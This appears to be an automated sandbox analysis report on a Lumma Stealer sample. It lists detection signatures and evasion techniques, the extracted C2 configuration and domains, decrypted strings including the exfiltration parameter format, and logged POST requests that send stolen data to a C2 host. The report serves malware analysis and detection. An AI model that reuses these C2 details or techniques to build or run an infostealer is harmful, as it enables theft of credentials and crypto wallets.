Windows Analysis Report
k7T6akLcAr.exe

Overview

General Information

Sample name:k7T6akLcAr.exe
renamed because original name is a hash value
Original sample name:fccb91d8f4ef18da22c21583c82c56c0.exe
Analysis ID:1581595
MD5:fccb91d8f4ef18da22c21583c82c56c0
SHA1:8c102cc60221c9fc5d83b84c86f70f735d3e8214
SHA256:b98dde6aa8a1e509e9def76dbfc5da5518b52d0b23abbba5525fd7739b8e605b
Tags:exeuser-abuse_ch
Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • k7T6akLcAr.exe (PID: 6032 cmdline: "C:\Users\user\Desktop\k7T6akLcAr.exe" MD5: FCCB91D8F4EF18DA22C21583C82C56C0)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["scentniej.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "appliacnesot.buzz", "inherineau.buzz", "prisonyfork.buzz", "screwamusresz.buzz", "mindhandru.buzz", "hummskitnj.buzz"], "Build id": "LOGS11--LiveTraffic"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.2310705621.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: k7T6akLcAr.exe PID: 6032 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: k7T6akLcAr.exe PID: 6032 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
              No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-28T09:40:39.542504+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49708 | 23.55.153.106 | 443 | TCP
2024-12-28T09:40:41.997663+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49711 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:44.043402+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49712 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:46.404954+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49718 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:48.769334+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49724 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:51.149799+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49734 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:53.751677+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49745 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:56.618003+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49752 | 172.67.157.254 | 443 | TCP
2024-12-28T09:41:00.510681+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49764 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:42.754289+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49711 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:44.806133+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49712 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:42.754289+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49711 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:44.806133+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49712 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:37.482669+0100 | 2058572 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 62373 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:37.628228+0100 | 2058576 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 59338 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:37.770258+0100 | 2058578 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 55955 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:37.187079+0100 | 2058580 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 54388 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:36.603434+0100 | 2058582 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 51430 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:36.754966+0100 | 2058584 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 54712 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:36.898768+0100 | 2058586 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 54194 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:37.042295+0100 | 2058588 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 52736 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:37.334435+0100 | 2058590 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 65021 | 1.1.1.1 | 53 | UDP
2024-12-28T09:40:54.892469+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49745 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:56.694770+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.6 | 49752 | 172.67.157.254 | 443 | TCP
2024-12-28T09:40:40.342216+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49708 | 23.55.153.106 | 443 | TCP

              AV Detection

              Source: k7T6akLcAr.exeAvira: detected
              Source: https://lev-tolstoi.com:443/apingNot_NullproductStateAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/apiFVAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/pi;Avira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/$$Avira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/api?Avira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/api9Avira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/api3Avira URL Cloud: Label: malware
              Source: k7T6akLcAr.exe.6032.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["scentniej.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "appliacnesot.buzz", "inherineau.buzz", "prisonyfork.buzz", "screwamusresz.buzz", "mindhandru.buzz", "hummskitnj.buzz"], "Build id": "LOGS11--LiveTraffic"}
              Source: k7T6akLcAr.exeReversingLabs: Detection: 55%
              Source: k7T6akLcAr.exeVirustotal: Detection: 56%Perma Link
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: k7T6akLcAr.exeJoe Sandbox ML: detected
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: mindhandru.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
              Source: k7T6akLcAr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49752 version: TLS 1.2

              Networking

              Source: Network trafficSuricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.6:55955 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.6:59338 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.6:54388 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.6:62373 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058582 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) : 192.168.2.6:51430 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.6:54712 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.6:54194 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.6:65021 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.6:52736 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49712 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49745 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49752 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49711 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49708 -> 23.55.153.106:443
              Source: Malware configuration extractorURLs: scentniej.buzz
              Source: Malware configuration extractorURLs: cashfuzysao.buzz
              Source: Malware configuration extractorURLs: rebuildeso.buzz
              Source: Malware configuration extractorURLs: appliacnesot.buzz
              Source: Malware configuration extractorURLs: inherineau.buzz
              Source: Malware configuration extractorURLs: prisonyfork.buzz
              Source: Malware configuration extractorURLs: screwamusresz.buzz
              Source: Malware configuration extractorURLs: mindhandru.buzz
              Source: Malware configuration extractorURLs: hummskitnj.buzz
              Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
              Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49745 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 23.55.153.106:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49734 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49752 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49764 -> 172.67.157.254:443
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5A1OQ2ITZ8JFW4J4U7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12865Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HKGKVS9PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15051Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=88L03U2R39User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19921Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3M7PF216BJCAA9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1204Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BQB73OBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570960Host: lev-tolstoi.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
              Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
              Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
              Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
              Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
              Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
              Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
              Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
              Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
